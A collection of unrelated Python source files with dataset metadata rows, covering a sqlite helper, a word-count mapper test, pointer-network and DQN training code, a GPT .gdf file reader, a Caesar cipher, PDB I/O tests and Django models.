        into the SQL, so they must come from trusted code, not user input
    :return: list of row tuples
    """
    query = f'''
        SELECT {', '.join(fields)} FROM INFO;
    '''
    cursor = conn.cursor()
    cursor.execute(query)
    return cursor.fetchall()
def insert(conn, data: dict):
    """Insert one row into the INFO table.

    :param conn: open sqlite3 connection
    :param data: dict whose values are bound IN ITERATION ORDER -- the
        caller must supply the 11 fields in the column order of the SQL below
    :return: rowid of the inserted row
    """
    sql = '''
        INSERT INTO INFO(CityPopulation,
        EmploymentField,
        EmploymentStatus,
        Gender,
        HasDebt,
        LanguageAtHome,
        JobPref,
        JobWherePref,
        SchoolDegree,
        MaritalStatus,
        Income) VALUES(?,?,?,?,?,?,?,?,?,?,?);
    '''
    values = list(data.values())
    cursor = conn.cursor()
    cursor.execute(sql, values)
    return cursor.lastrowid
| true |
a05ed819105a92ab482f3496765f236012e0f945 | Python | drkiettran/mapreduce-py | /test/WordCountMapper_test.py | UTF-8 | 807 | 3.015625 | 3 | [] | no_license | import unittest
from app.WordCountMapper import WordCountMapper
from test.IOUtil import StringIO
import sys
class TestWordCountMapper(unittest.TestCase):
    """Unit tests for WordCountMapper's line tokenising and stdin-driven map()."""

    def setUp(self):
        # Fresh mapper per test, with stdout redirected into a StringIO so
        # map()'s emitted key/value pairs can be inspected.
        self.mapper = WordCountMapper()
        self.captured_output = StringIO()
        sys.stdout = self.captured_output

    def tearDown(self):
        # Restore the real stdout so later tests/prints behave normally.
        sys.stdout = sys.__stdout__

    def test_process_line(self):
        # proc_line should split on punctuation/whitespace, keeping only words.
        words = self.mapper.proc_line("abcdef.; -abc xyz-abd ad? efr;")
        self.assertEqual(words, ['abcdef', 'abc', 'xyz', 'abd', 'ad', 'efr'])

    def test_map(self):
        # map() reads stdin and emits one "word\t1" line per token; stdout is
        # restored before asserting so the failure message prints normally.
        sys.stdin = StringIO("abcdef.; -abc xyz-abd ad? efr;")
        self.mapper.map()
        sys.stdout = sys.__stdout__
        self.assertTrue('abcdef\t1\nabc\t1\nxyz\t1\nabd\t1\nad\t1\nefr\t1' in self.captured_output.getvalue())
| true |
81a260a480f85da67d8f8b3459571313471f6d41 | Python | zaidhassanch/PointerNetworks | /T007_gen_words_spacy_vectors/main.py | UTF-8 | 1,805 | 2.703125 | 3 | [] | no_license | import torch.optim as optim
from generateData import batch
import config
import time
from pointerNetwork import PointerNetwork
import torch
import torch.nn as nn
import time
BATCH_SIZE = 32
EPOCHS = 10
STEPS_PER_EPOCH = 100
def train(pNet, optimizer, epoch, clip=1.):
    """Train single epoch.

    :param pNet: pointer network being optimised
    :param optimizer: optimiser over pNet's parameters
    :param epoch: 1-based epoch index (used for logging only)
    :param clip: max gradient norm for clip_grad_norm_
    """
    print('Epoch [{}] -- Train'.format(epoch))
    #x, y, t = batch(BATCH_SIZE)
    start = time.time()
    for step in range(STEPS_PER_EPOCH):
        optimizer.zero_grad()
        # Fresh random batch every step.
        # NOTE(review): the (x, y, t) meaning is inferred from usage in
        # evaluateWordSort (inputs, target order, raw text) -- confirm.
        x, y, t = batch(BATCH_SIZE)
        # Forward
        out, loss = pNet(x, y)
        # Backward
        loss.backward()
        nn.utils.clip_grad_norm_(pNet.parameters(), clip)
        optimizer.step()
        # Log every 10 steps, timing the elapsed interval.
        if (step + 1) % 10 == 0:
            duration = time.time() - start
            print('Epoch [{}] loss: {} time:{:.2f}'.format(epoch, loss.item(), duration))
            start = time.time()
def evaluateWordSort(model, epoch):
    """Evaluate after a train epoch.

    Prints, for a 4-sample validation batch, the reference vs predicted
    orderings and the words reordered by the predicted pointer indices.
    """
    print('Epoch [{}] -- Evaluate'.format(epoch))
    x_val, y_val, text_val = batch(4, True)
    # teacher_force_ratio=0. -> pure greedy decoding, no ground-truth feeding.
    out, _ = model(x_val, y_val, teacher_force_ratio=0.)
    out = out.permute(1, 0)  # -> (batch, sequence) for per-sample printing
    for i in range(out.size(0)):
        print("=============================================")
        # Reference indices, predicted indices, and their element-wise delta.
        print("yref", y_val[i], out[i], y_val[i] - out[i])
        print("orig", text_val[i])
        v = torch.Tensor.cpu(out[i]).numpy()
        # Print the words in the predicted order.
        print("[", end="")
        for index in v:
            print(text_val[i][index]+" ", end="")
        print("]")
# Build the pointer network on GPU or CPU depending on config.
if config.GPU == True:
    ptrNet = PointerNetwork(config.HIDDEN_SIZE).cuda()
else:
    ptrNet = PointerNetwork(config.HIDDEN_SIZE)
optimizer = optim.Adam(ptrNet.parameters())
program_starts = time.time()
# Train and evaluate once per epoch.
for epoch in range(EPOCHS):
    train(ptrNet, optimizer, epoch + 1)
    evaluateWordSort(ptrNet, epoch + 1)
now = time.time()
print("It has been {0} seconds since the loop started".format(now - program_starts))
| true |
6dcb109eabb3126a94c0a153562ebd879cb47ba2 | Python | VELA-CLARA-software/Software | /Apps/AlignOnBPMs/SimulationFramework/Modules/read_gdf_file.py | UTF-8 | 9,798 | 2.515625 | 3 | [] | no_license | """Reads in files from General Particle Tracer .gdf files
"""
from __future__ import division
# from pylab import *
import time
import struct
import os
import sys
import numpy as np
#Constants
GDFNAMELEN = 16; #Length of the ascii-names
GDFID = 94325877; #ID for GDF
#Data types (encoded in the low byte of a block's type word)
t_ascii = int('0001', 16) #ASCII character
t_s32 = int('0002', 16) #Signed long
t_dbl = int('0003', 16) #Double
t_undef = int('0000', 16) #Data type not defined
t_null = int('0010', 16) #No data
t_u8 = int('0020', 16) #Unsigned char
t_s8 = int('0030', 16) #Signed char
t_u16 = int('0040', 16) #Unsigned short
t_s16 = int('0050', 16) #Signed short
t_u32 = int('0060', 16) #Unsigned long
t_u64 = int('0070', 16) #Unsigned 64bit int
t_s64 = int('0080', 16) #Signed 64bit int
t_flt = int('0090', 16) #Float
#Block types (bit flags in the high bits of the type word)
t_dir = 256 # Directory entry start
t_edir = 512 # Directory entry end
t_sval = 1024 # Single valued
t_arr = 2048 # Array
class grab_group(object):
    """One 'grab' of GPT output: named attributes plus named sub-groups."""

    def __init__(self, name):
        self.name = name
        self.attrs = {}
        self.groups = {}

    def create_group(self, name):
        """Create, register and return a child group."""
        child = self.group(name)
        self.groups[name] = child
        return child

    class group(object):
        """A named container of datasets, each also exposed as an attribute."""

        def __init__(self, name):
            self.name = name
            self.datasets = []

        def create_dataset(self, name, data=()):
            """Record `name` in the dataset list and attach `data` as an
            attribute of the same name."""
            self.datasets.append(name)
            setattr(self, name, data)
class read_gdf_file(object):
    """Parser for General Particle Tracer .gdf binary files (Python 2 code:
    note the print statements and byte-as-str handling below).

    Parsing happens entirely in __init__: the main header fills self.attrs,
    and each run of array blocks becomes one grab_group with 'data' and
    'param' sub-groups in self.grab_groups.
    """
    ###############################################################################
    def create_grab_group(self, name):
        # Register and return a new grab_group under self.grab_groups.
        # NOTE(review): the local variable `grab_group` in __init__ shadows
        # the module-level grab_group class used here.
        self.grab_groups[name] = grab_group(name)
        return self.grab_groups[name]

    @property
    def positions(self):
        """All 'position' parameter values across grabs (projection outputs)."""
        positions = []
        for datagrab in self.grab_groups.values():
            if hasattr(datagrab.groups['param'],'position'):
                positions.append(datagrab.groups['param'].position)
        return positions

    def get_position(self, position):
        """Return the 'data' group of the grab taken at `position` (string
        comparison), or None if no grab matches."""
        for datagrab in self.grab_groups.values():
            if hasattr(datagrab.groups['param'],'position'):
                if str(datagrab.groups['param'].position) == str(position):
                    return datagrab.groups['data']

    @property
    def times(self):
        """All 'time' parameter values across grabs (time-snapshot outputs)."""
        times = []
        for datagrab in self.grab_groups.values():
            if hasattr(datagrab.groups['param'],'time'):
                times.append(datagrab.groups['param'].time)
        return times

    def get_time(self, time):
        """Return the 'data' group of the grab taken at `time` (string
        comparison), or None if no grab matches."""
        for datagrab in self.grab_groups.values():
            if hasattr(datagrab.groups['param'],'time'):
                if str(datagrab.groups['param'].time) == str(time):
                    return datagrab.groups['data']

    def get_grab(self, grab_group_number=0):
        """Return the 'data' group of grab number `grab_group_number`."""
        for name, datagrab in self.grab_groups.items():
            if name == 'datagrab_' + str(grab_group_number):
                return datagrab.groups['data']

    def __init__(self, filename):
        self.attrs = {}
        self.grab_groups = {}
        self.filename = filename
        with open(self.filename, 'rb') as f: #Important to open in binary mode 'b' to work cross platform
            #Read the GDF main header
            gdf_id_check = struct.unpack('i', f.read(4))[0]
            if gdf_id_check != GDFID:
                raise RuntimeWarning('File is not a .gdf file')
            self.attrs['time_created'] = struct.unpack('i', f.read(4))[0]
            #get creator name and use string part upto zero-character
            creator = list(f.read(GDFNAMELEN))
            # Python 2: f.read yields a str, so each element is a 1-char string.
            creator = [struct.unpack('B', element)[0] for element in creator]
            creator_name = []
            for element in creator:
                # NOTE(review): `is 0` relies on CPython small-int interning;
                # `== 0` would be the robust comparison.
                if element is 0:
                    break
                else:
                    creator_name.append(chr(element))
            # NOTE(review): stored as a list of characters, unlike
            # 'destination' below which is joined into a string -- confirm
            # whether this inconsistency is intended.
            self.attrs['creator_name'] = creator_name
            #get destination and use string part upto zero-character
            dest = f.read(GDFNAMELEN)
            dest = [struct.unpack('B', element)[0] for element in dest]
            destination = []
            for element in dest:
                if element is 0:
                    break
                else:
                    destination.append(chr(element))
            self.attrs['destination'] = ''.join(destination)
            #get other metadata about the GDF file
            major = struct.unpack('B', f.read(1))[0]
            minor = struct.unpack('B', f.read(1))[0]
            self.attrs['gdf_version'] = str(major) + '.' + str(minor)
            major = struct.unpack('B', f.read(1))[0]
            minor = struct.unpack('B', f.read(1))[0]
            self.attrs['creator_version'] = str(major) + '.' + str(minor)
            major = struct.unpack('B', f.read(1))[0]
            minor = struct.unpack('B', f.read(1))[0]
            self.attrs['destination_version'] = str(major) + '.' + str(minor)
            f.seek(2, 1) # skip to next block
            #Create first hdf group and sub groups for data to be put into
            #First group is called "datagrab" because it could be output at a particular time, or the projection at a particular position
            grab_group_number = 0
            grab_group = self.create_grab_group('datagrab_' + str(grab_group_number))
            grab_group.attrs['grab_number'] = grab_group_number
            data_group = grab_group.create_group('data')
            param_group = grab_group.create_group('param')
            #Read GDF data blocks
            lastarr = False
            while True:
                # Python 2 EOF probe: read() returns '' at end of file.
                if f.read(1) == '':
                    break
                f.seek(-1, 1)
                #Read GDF block header: 16-byte name, 4-byte type, 4-byte size.
                name = f.read(16)
                typee = struct.unpack('i', f.read(4))[0]
                size = struct.unpack('i', f.read(4))[0]
                #Get name
                import string
                printable = set(string.printable)
                def find_name(name):
                    # Extract the first printable run terminated by a
                    # non-printable byte.
                    # NOTE(review): falls off the end (returns None) when the
                    # whole buffer is printable; str(None) then yields 'None'.
                    found_str = ""
                    for char in name:
                        if char in printable:
                            found_str += char
                        elif len(found_str) >= 1:
                            return found_str
                        else:
                            found_str = ""
                name = str(find_name(name))
                name = name
                #Get block type (bit flags in the type word)
                dir = int(typee & t_dir > 0)
                edir = int(typee & t_edir > 0)
                sval = int(typee & t_sval > 0)
                arr = int(typee & t_arr > 0)
                #Get data type
                dattype = typee & 255
                #Check if array block is finished
                if lastarr and not arr:
                    #We save the stuff as we go rather than storing it in local dictionaries and creating all the groups at the end. Here we make the groups for next time step, as this code only runs when all data current block has been extracted
                    grab_group_number += 1
                    grab_group = self.create_grab_group('datagrab_' + str(grab_group_number))
                    grab_group.attrs['grab_number'] = grab_group_number
                    data_group = grab_group.create_group('data')
                    param_group = grab_group.create_group('param')
                #Read single value
                if sval:
                    if dattype == t_dbl:
                        # print 'new dbl = ', name
                        value = struct.unpack('d', f.read(8))[0]
                        # print '  dbl = ', value
                        param_group.create_dataset(name, data=value)
                    elif dattype == t_null:
                        # print 'new null = ', name
                        pass
                    elif dattype == t_ascii:
                        # print 'new ascii = ', name
                        value = str(f.read(size))
                        value = value.strip(' \t\r\n\0')
                        # print '  ascii = ', value
                        try:
                            param_group.create_dataset(name, data=value)
                        except RuntimeError:
                            # NOTE(review): grab_group.group.create_dataset
                            # never raises RuntimeError nor supports `del` by
                            # key -- this branch looks like a leftover from an
                            # h5py-based implementation; confirm.
                            del param_group[name]
                            param_group.create_dataset(name, data=value)
                    elif dattype == t_s32:
                        # print 'new s32 = ', name
                        value = struct.unpack('i', f.read(4))[0]
                        param_group.create_dataset(name, data=value)
                    else:
                        print 'unknown datatype of value!!!'
                        print 'name=', name
                        print 'type=', typee
                        print 'size=', size
                        value = f.read(size)
                #Read data array
                if arr:
                    if dattype == t_dbl:
                        if (size % 8) != 0:
                            raise RuntimeWarning('Tried to save an array of doubles, but the array size is not consistant with that of doubles.')
                        value = np.fromfile(f, dtype=np.dtype('f8'), count=int(size/8))
                        data_group.create_dataset(name, data=value)
                        # print 'new dataset = ', name
                    else:
                        print 'unknown datatype of value!!!'
                        print 'name=', name
                        print 'type=', typee
                        print 'size=', size
                        value = f.read(size)
                lastarr = arr;
        # Redundant: the with-statement has already closed f; close() on a
        # closed file is a no-op.
        f.close()
| true |
8bb17a007730f2c60b3965c171cd3b68637af165 | Python | hengyuan-hu/dqn-hw | /model.py | UTF-8 | 9,654 | 2.828125 | 3 | [] | no_license | """Implement the Q network as a torch.nn Module"""
import torch
import torch.nn as nn
from torch.autograd import Variable
import utils
class QNetwork(nn.Module):
    """Base class for deep Q-networks.

    Subclasses provide ``_build_model``/``forward``; this class owns weight
    initialisation, the RMSprop optimizer, the Huber (smooth-L1) loss on the
    chosen action's Q-value, and a single optimisation step.
    """

    def __init__(self, num_frames, frame_size, num_actions, optim_args, net_file):
        """
        num_frames: number of stacked frames, i.e. input channels
        frame_size: int, frames are assumed square
        num_actions: number of output Q-values
        optim_args: dict of keyword args forwarded to torch.optim.RMSprop
        net_file: file passed to utils.init_net for weight initialisation
        """
        super(QNetwork, self).__init__()
        self._build_model((num_frames, frame_size, frame_size), num_actions)
        utils.init_net(self, net_file)
        self.cuda()
        self.optim = torch.optim.RMSprop(self.parameters(), **optim_args)

    def _build_model(self, input_shape, num_actions):
        """Create the layers for (channels, height, width) input; subclass hook."""
        raise NotImplementedError

    def forward(self, x):
        """Map a batch of frame stacks to per-action Q-values; subclass hook."""
        raise NotImplementedError

    def loss(self, x, a, y):
        """Smooth-L1 loss between Q(x, a) and target y; *a* is one-hot (N, A)."""
        utils.assert_eq(a.dim(), 2)
        q = self.forward(Variable(x))
        utils.assert_eq(q.size(), a.size())
        # Select the Q-value of the taken action via the one-hot mask.
        chosen = (q * Variable(a)).sum(1)
        return nn.functional.smooth_l1_loss(chosen, Variable(y))

    def train_step(self, x, a, y, grad_clip=None):
        """Run one gradient step and return the scalar loss value."""
        loss_val = self.loss(x, a, y)
        loss_val.backward()
        if grad_clip:
            nn.utils.clip_grad_norm(self.parameters(), grad_clip)
        self.optim.step()
        self.zero_grad()
        return loss_val.data[0]
class DQNetwork(QNetwork):
    """Vanilla DQN head: three conv layers followed by a two-layer MLP."""

    def _build_model(self, input_shape, num_actions):
        """Assemble self.conv and self.fc; module names match the original checkpoints."""
        conv = nn.Sequential()
        for tag, layer in [
                ('conv1', nn.Conv2d(input_shape[0], 32, 8, 4)),
                ('relu1', nn.ReLU(inplace=True)),
                ('conv2', nn.Conv2d(32, 64, 4, 2)),
                ('relu2', nn.ReLU(inplace=True)),
                ('conv3', nn.Conv2d(64, 64, 3, 1)),
                ('relu3', nn.ReLU(inplace=True))]:
            conv.add_module(tag, layer)
        flat_size = utils.count_output_size((1,) + input_shape, conv)
        hidden = 512
        fc = nn.Sequential()
        for tag, layer in [
                ('fc1', nn.Linear(flat_size, hidden)),
                ('fc_relu1', nn.ReLU(inplace=True)),
                ('output', nn.Linear(hidden, num_actions))]:
            fc.add_module(tag, layer)
        self.conv = conv
        self.fc = fc

    def forward(self, x):
        # Scale raw byte frames into [0, 1]; note this mutates x in place.
        x.div_(255.0)
        out = self.conv(x)
        out = self.fc(out.view(out.size(0), -1))
        utils.assert_eq(out.dim(), 2)
        return out
class DuelingQNetwork(QNetwork):
    """Dueling DQN: shared conv trunk, separate advantage and value streams."""

    def _build_model(self, input_shape, num_actions):
        """Assemble self.conv, self.fc_a (advantage) and self.fc_v (value)."""
        conv = nn.Sequential()
        for tag, layer in [
                ('conv1', nn.Conv2d(input_shape[0], 32, 8, 4)),
                ('relu1', nn.ReLU(inplace=True)),
                ('conv2', nn.Conv2d(32, 64, 4, 2)),
                ('relu2', nn.ReLU(inplace=True)),
                ('conv3', nn.Conv2d(64, 64, 3, 1)),
                ('relu3', nn.ReLU(inplace=True))]:
            conv.add_module(tag, layer)
        flat_size = utils.count_output_size((1,) + input_shape, conv)
        hidden = 512
        fc_a = nn.Sequential()
        for tag, layer in [
                ('fc1', nn.Linear(flat_size, hidden)),
                ('fc_relu1', nn.ReLU(inplace=True)),
                ('adv', nn.Linear(hidden, num_actions))]:
            fc_a.add_module(tag, layer)
        fc_v = nn.Sequential()
        for tag, layer in [
                ('fc2', nn.Linear(flat_size, hidden)),
                ('fc_relu2', nn.ReLU(inplace=True)),
                ('val', nn.Linear(hidden, 1))]:
            fc_v.add_module(tag, layer)
        self.conv = conv
        self.fc_a = fc_a
        self.fc_v = fc_v

    def forward(self, x):
        # In-place scaling of byte-valued frames into [0, 1].
        x.div_(255.0)
        feat = self.conv(x)
        feat = feat.view(feat.size(0), -1)
        adv = self.fc_a(feat)
        # Dueling combination: Q = A + (V - mean(A)).
        val = self.fc_v(feat) - adv.mean(1)
        q = adv + val.expand_as(adv)
        utils.assert_eq(q.dim(), 2)
        return q
class PredDuelingQNetwork(QNetwork):
    """Dueling network with an extra head that predicts the next state's value.

    NOTE(review): loss/train_step take an extra ``next_v`` argument, so they do
    not match the base-class signatures -- callers must use this class directly.
    """
    def _build_model(self, input_shape, num_actions):
        """Build the conv trunk plus three heads: advantage, value, next-V prediction."""
        conv = nn.Sequential()
        conv.add_module('conv1', nn.Conv2d(input_shape[0], 32, 8, 4))
        conv.add_module('relu1', nn.ReLU(inplace=True))
        conv.add_module('conv2', nn.Conv2d(32, 64, 4, 2))
        conv.add_module('relu2', nn.ReLU(inplace=True))
        conv.add_module('conv3', nn.Conv2d(64, 64, 3, 1))
        conv.add_module('relu3', nn.ReLU(inplace=True))
        # Flattened size of the conv output for a single input.
        num_fc_in = utils.count_output_size((1,)+input_shape, conv)
        num_fc_out = 512
        fc_a = nn.Sequential()
        fc_a.add_module('fc_a', nn.Linear(num_fc_in, num_fc_out))
        fc_a.add_module('relu_a', nn.ReLU(inplace=True))
        fc_a.add_module('adv', nn.Linear(num_fc_out, num_actions))
        fc_v = nn.Sequential()
        fc_v.add_module('fc_v', nn.Linear(num_fc_in, num_fc_out))
        fc_v.add_module('relu_v', nn.ReLU(inplace=True))
        fc_v.add_module('val', nn.Linear(num_fc_out, 1))
        # Per-action prediction of the next state's value.
        fc_pred_v = nn.Sequential()
        fc_pred_v.add_module('fc_pred_v', nn.Linear(num_fc_in, num_fc_out))
        fc_pred_v.add_module('relu_pred_v', nn.ReLU(inplace=True))
        fc_pred_v.add_module('pred_v', nn.Linear(num_fc_out, num_actions))
        self.conv = conv
        self.fc_a = fc_a
        self.fc_v = fc_v
        self.fc_pred_v = fc_pred_v
    def forward(self, x, pred):
        # TODO: better naming if works
        # Returns (q, v, pred_v); pred_v is None unless ``pred`` is truthy.
        x.div_(255.0)  # in-place scaling of byte frames into [0, 1]
        conv = self.conv(x)
        conv = conv.view(conv.size(0), -1)
        a = self.fc_a(conv)
        # In-place mean-centering of the advantages (dueling trick).
        a.sub_(a.mean(1).expand_as(a))
        v = self.fc_v(conv)
        q = a + v.expand_as(a)
        utils.assert_eq(q.dim(), 2)
        pred_v = None
        if pred:
            pred_v = self.fc_pred_v(conv)
            utils.assert_eq(pred_v.size(), q.size())
        return q, v, pred_v
    def loss(self, x, a, y, next_v):
        """Return (TD loss on Q(x, a), loss of the next-V prediction); *a* is one-hot."""
        q_vals, _, pred_v = self.forward(Variable(x), pred=True)
        a = Variable(a)
        y_pred = (q_vals * a).sum(1)
        y_err = nn.functional.smooth_l1_loss(y_pred, Variable(y))
        # Select the next-V prediction of the taken action.
        next_v_pred = (pred_v * a).sum(1)
        next_v_err = nn.functional.smooth_l1_loss(next_v_pred, Variable(next_v))
        return y_err, next_v_err
    def train_step(self, x, a, y, next_v, grad_clip=None):
        """One gradient step on the sum of both losses; returns the two scalars."""
        y_err, next_v_err = self.loss(x, a, y, next_v)
        err = y_err + next_v_err
        err.backward()
        if grad_clip:
            nn.utils.clip_grad_norm(self.parameters(), grad_clip)
        self.optim.step()
        self.zero_grad()
        return y_err.data[0], next_v_err.data[0]
class SinglePredDuelingQNetwork(QNetwork):
    """Dueling network with a single-output next-V head conditioned on the
    greedy action index (concatenated to the features).

    NOTE(review): loss/train_step take an extra ``next_v`` argument, so they do
    not match the base-class signatures -- callers must use this class directly.
    """
    def _build_model(self, input_shape, num_actions):
        """Build the conv trunk, advantage/value heads, and the scalar next-V head."""
        conv = nn.Sequential()
        conv.add_module('conv1', nn.Conv2d(input_shape[0], 32, 8, 4))
        conv.add_module('relu1', nn.ReLU(inplace=True))
        conv.add_module('conv2', nn.Conv2d(32, 64, 4, 2))
        conv.add_module('relu2', nn.ReLU(inplace=True))
        conv.add_module('conv3', nn.Conv2d(64, 64, 3, 1))
        conv.add_module('relu3', nn.ReLU(inplace=True))
        num_fc_in = utils.count_output_size((1,)+input_shape, conv)
        num_fc_out = 512
        fc_a = nn.Sequential()
        fc_a.add_module('fc_a', nn.Linear(num_fc_in, num_fc_out))
        fc_a.add_module('relu_a', nn.ReLU(inplace=True))
        fc_a.add_module('adv', nn.Linear(num_fc_out, num_actions))
        fc_v = nn.Sequential()
        fc_v.add_module('fc_v', nn.Linear(num_fc_in, num_fc_out))
        fc_v.add_module('relu_v', nn.ReLU(inplace=True))
        fc_v.add_module('val', nn.Linear(num_fc_out, 1))
        # fc_pred_v = nn.Sequential()
        # Next-V head: +1 input for the greedy action index appended in forward().
        self.pred_v_fc1 = nn.Linear(num_fc_in, num_fc_out)
        self.pred_v_relu1 = nn.ReLU(inplace=True)
        self.pred_v_output = nn.Linear(num_fc_out+1, 1)
        self.conv = conv
        self.fc_a = fc_a
        self.fc_v = fc_v
    def forward(self, x, pred):
        # TODO: better naming if works
        # Returns (q, v, pred_v); pred_v is None unless ``pred`` is truthy.
        x.div_(255.0)  # in-place scaling of byte frames into [0, 1]
        conv = self.conv(x)
        conv = conv.view(conv.size(0), -1)
        a = self.fc_a(conv)
        # In-place mean-centering of the advantages (dueling trick).
        a.sub_(a.mean(1).expand_as(a))
        v = self.fc_v(conv)
        q = a + v.expand_as(a)
        utils.assert_eq(q.dim(), 2)
        pred_v = None
        if pred:
            # Greedy action index, detached from the graph and cast to float
            # so it can be concatenated with the feature column below.
            action = a.max(1)[1].data.float()
            # print action[:10]
            pred_v = nn.functional.relu(self.pred_v_fc1(conv))
            pred_v = torch.cat((pred_v, Variable(action)), 1)
            # print pred_v.size()
            pred_v = self.pred_v_output(pred_v)
            # print '>>>', pred_v.size()
            # pred_v = self.fc_pred_v(conv)
            # utils.assert_eq(pred_v.size(), q.size())
        return q, v, pred_v
    def loss(self, x, a, y, next_v):
        """Return (TD loss on Q(x, a), loss of the scalar next-V prediction)."""
        q_vals, _, pred_v = self.forward(Variable(x), pred=True)
        a = Variable(a)
        y_pred = (q_vals * a).sum(1)
        y_err = nn.functional.smooth_l1_loss(y_pred, Variable(y))
        # next_v_pred = (pred_v * a).sum(1)
        next_v_err = nn.functional.smooth_l1_loss(pred_v, Variable(next_v))
        return y_err, next_v_err
    def train_step(self, x, a, y, next_v, grad_clip=None):
        """One gradient step on the sum of both losses; returns the two scalars."""
        y_err, next_v_err = self.loss(x, a, y, next_v)
        err = y_err + next_v_err
        err.backward()
        if grad_clip:
            nn.utils.clip_grad_norm(self.parameters(), grad_clip)
        self.optim.step()
        self.zero_grad()
        return y_err.data[0], next_v_err.data[0]
if __name__ == '__main__':
import copy
qn = QNetwork(4, 84, 4, 0.1)
print qn
for p in qn.parameters():
print p.mean().data[0], p.std().data[0]
fake_input = Variable(torch.cuda.FloatTensor(10, 4, 84, 84), volatile=True)
print qn(fake_input).size()
qn_target = copy.deepcopy(qn)
| true |
class Caesar:
    """Caesar (shift) cipher over the 33-letter Russian alphabet.

    Characters that are not in the alphabet (in either case) pass through
    unchanged; the shift key may be any integer (it is taken modulo 33).
    """
    alphabet = "абвгдеёжзийклмнопрстуфхцчшщъыьэюя"
    def __init__(self, key):
        """Precompute the encode and decode substitution tables for *key*."""
        size = len(self.alphabet)
        lowercase_code = {self.alphabet[i]: self.alphabet[(i + key) % size]
                          for i in range(size)}
        uppercase_code = {plain.upper(): shifted.upper()
                          for plain, shifted in lowercase_code.items()}
        self._encode = dict(lowercase_code)
        self._encode.update(uppercase_code)
        # The shift is a bijection, so the table can be inverted directly.
        # This removes the dependency on the module-level invert_dict helper,
        # which joins colliding keys into a single string and could break
        # decoding if it were ever used with a non-bijective table.
        self._decode = {v: k for k, v in self._encode.items()}
    def encode(self, line):
        """Return *line* with each alphabet letter shifted forward by the key."""
        if len(line) == 1:
            return self._encode.get(line, line)
        return ''.join(self.encode(char) for char in line)
    def decode(self, line):
        """Return *line* with each alphabet letter shifted back by the key."""
        if len(line) == 1:
            return self._decode.get(line, line)
        return ''.join(self.decode(char) for char in line)
def invert_dict(d):
    """Invert *d*: map each value to the concatenation of the keys that had it.

    Bug fix: the original joined the key list into a string on every loop
    iteration, so a second key with the same value called ``.append`` on a
    str and raised AttributeError.  Keys are now collected first and joined
    once at the end; key order follows the iteration order of *d*.
    """
    grouped = {}
    for key, value in d.items():
        grouped.setdefault(value, []).append(key)
    return {value: ''.join(str(k) for k in keys)
            for value, keys in grouped.items()}
# Interactive driver.  Prompts/labels are in Russian:
#   'Введите ключ:'  = 'Enter the key:'
#   'Кодирование'    = 'Encoding'
#   'Декодирование'  = 'Decoding'
key = int(input('Введите ключ:'))
cipher = Caesar(key)
print('Кодирование')
line = input()
# An empty input line ends the encoding phase.
while line:
    print(cipher.encode(line))
    line = input()
print('Декодирование')
line = input()
# An empty input line ends the decoding phase.
while line:
    print(cipher.decode(line))
    line = input()
| true |
e1f3fb677bcd9fc0d7ab6f00d41ac7dd87a8668c | Python | dww100/bac | /common/test_pdb_io.py | UTF-8 | 1,124 | 2.546875 | 3 | [
"Apache-2.0"
] | permissive | # This test opens a simple PDB file (data/init_pdbs/pr/1mui_wat.pdb).
# It then attempts to manipulate this file using MDAnalysis.
from pdb_io import *
from operator import itemgetter, attrgetter
from nose.tools import assert_equals
data_dir = "../data"  # root of the test-data tree, relative to this file
def test_load_pdb_file():
    # Smoke test: loading the sample PDB must not raise.
    # NOTE: the Python 2 print statement below shows this suite predates Python 3.
    load_pdb("%s/init_pdbs/pr/1mui_wat.pdb" % data_dir)
    #universe = Universe(topology, trajectory)
    print "PDB file loaded!"
def test_print_pdb_file():
    # Smoke test: pretty-printing the sample PDB must not raise.
    print_pdb_file("%s/init_pdbs/pr/1mui_wat.pdb" % data_dir)
def test_pdb_select_and_merge():
    # Exercises selection, concatenation, sorting and merging of atom groups.
    u = load_pdb("%s/init_pdbs/pr/1mui_wat.pdb" % data_dir)
    # NOTE(review): 'target' is unused -- presumably left over from an earlier
    # version of the test.
    target = select_atoms(u, "segid A")
    s1 = select_atoms(u, "segid A and resnum 10")
    s2 = select_atoms(u, "segid A and not resnum 10")
    # s3 holds s2's atoms followed by s1's, i.e. not in index order.
    s3 = s2 + s1
    #if s3 is sorted properly, then the last element should be s2[-1]
    s4 = sort_atom_selection(s3)
    assert_equals(s2[-1].number, s4[-1].number)
    # merge_atom_selections is expected to sort as well, so the same
    # last-atom invariant must hold.
    s5 = merge_atom_selections([s2,s1])
    assert_equals(s2[-1].number, s5[-1].number)
def test_write_pdb_file():
    # Round trip: load the sample structure and write all of its atoms back out.
    u = load_pdb("%s/init_pdbs/pr/1mui_wat.pdb" % data_dir)
    s = u.selectAtoms("all")
    write_pdb_file(s, "test.pdb")
| true |
a3d7aefc9aeb825a4e97248bcf8cc1c1eb9c5937 | Python | feizhihui/Coursera-Python-Repo | /lecture_4/pandas_plot.py | UTF-8 | 204 | 2.953125 | 3 | [] | no_license | # encoding=utf-8
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Plot a damped sine wave through a pandas DataFrame.
xs = np.linspace(0, 1)
ys = np.exp(-5 * xs) * np.sin(4 * np.pi * xs)
frame = pd.DataFrame(ys, index=xs)
frame.plot()
plt.show()
| true |
f0b3abc16201d520f5b4383dc8aef1f0384903c8 | Python | olchowik/d_repo | /typeii/typeii/enzymes/models_old.py | UTF-8 | 5,173 | 2.671875 | 3 | [] | no_license | from django.db import models
class Genome(models.Model):
    """A sequenced genome; parent of one or more DNAPiece records."""
    #genome name
    name = models.CharField(unique=True, max_length=70)
    #This is what gets printed when we call this objects
    def __unicode__(self):
        # NOTE: __unicode__ implies Python 2 / old Django; __str__ is the
        # Python 3 equivalent.
        return 'Genome of: ' + self.name
class DNAPiece(models.Model):
    """One contiguous piece of DNA (e.g. a chromosome or plasmid) of a Genome."""
    #Reference to the genome (Genome-type object) in which the piece of DNA is located.
    genome = models.ForeignKey(Genome)
    #Name of the .ptt file (from the ncbi ftp site) with data on this piece of DNA
    name = models.CharField(unique=True, max_length=70)
    def __unicode__(self):
        return ('DNA piece: ' + self.name
                #use self.ForeignKey.attribute to access attribute of the Foreign Key -> here genome
                + ' in: ' + self.genome.name)
'''To improve:
subunit_composition, family_composition, subunit_family_composition, and probably system_kind
could have been created dynamically, based on the proteins, when the object is created.
**This would simplify new data entry**
Proposed solution:
1) use the __init__ function??
2) get all the proteins that belong to this system: system.protein_set
3) create subunit_composition using system.protein_set.subunit_kind,
and family_composition using system.protein_set.subunit_kind.hammer_cluster
4) build subunit_family_composition from the two previously created fields
'''
class System(models.Model):
    """A restriction-modification system: an ordered group of Protein subunits
